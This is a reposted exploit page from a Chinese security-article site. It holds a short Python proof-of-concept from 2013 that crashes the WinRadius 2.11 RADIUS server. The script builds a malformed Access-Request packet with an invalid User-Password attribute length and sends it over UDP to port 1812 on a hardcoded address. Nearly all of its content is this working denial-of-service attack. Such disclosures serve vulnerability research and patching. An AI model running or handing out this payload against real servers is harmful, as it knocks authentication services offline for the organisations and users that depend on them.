WinRadius 2.11 - Denial of Service

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

WinRadius 2.11 - Denial of Service

来源：http://www.iodigitalsec.com/ 作者：npn 发布时间：2013-06-13

#!/usr/bin/python


#Exploit Title: WinRadius 2.11 DoS
#Date: 10th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-winradius-2-11/
#Vendor Homepage: [ADVERT HOLDING PAGE] http://www.itconsult2000.com/
#Software Link: http://download.cnet.com/WinRadius/3000-2085_4-10131429.html
#Version: 2.2
#Tested on: Windows XP SP3 English
#Exploit-DB Note: Read author's write-up

from socket import *
import sys
import select

pwn =  "\x01" #Code 01
pwn += "\xff" #packet identifier
pwn += "\x00\x2c" #len 44
pwn += "\xd1\x56\x8a\x38\xfb\xea\x4a\x40\xb7\x8a\xa2\x7a\x8f\x3e\xae\x23" #authenticator
pwn += "\x01" #t=User-Name(1)
pwn += "\x06" #avp: l=6
pwn += "\x61\x64\x61\x6d" #adam

pwn += "\x02" #avp t=User-Password(2)
pwn += "\xff" #avp: l=18 
pwn += "\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21" #password (enc)

address = ('192.168.200.20', 1812)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告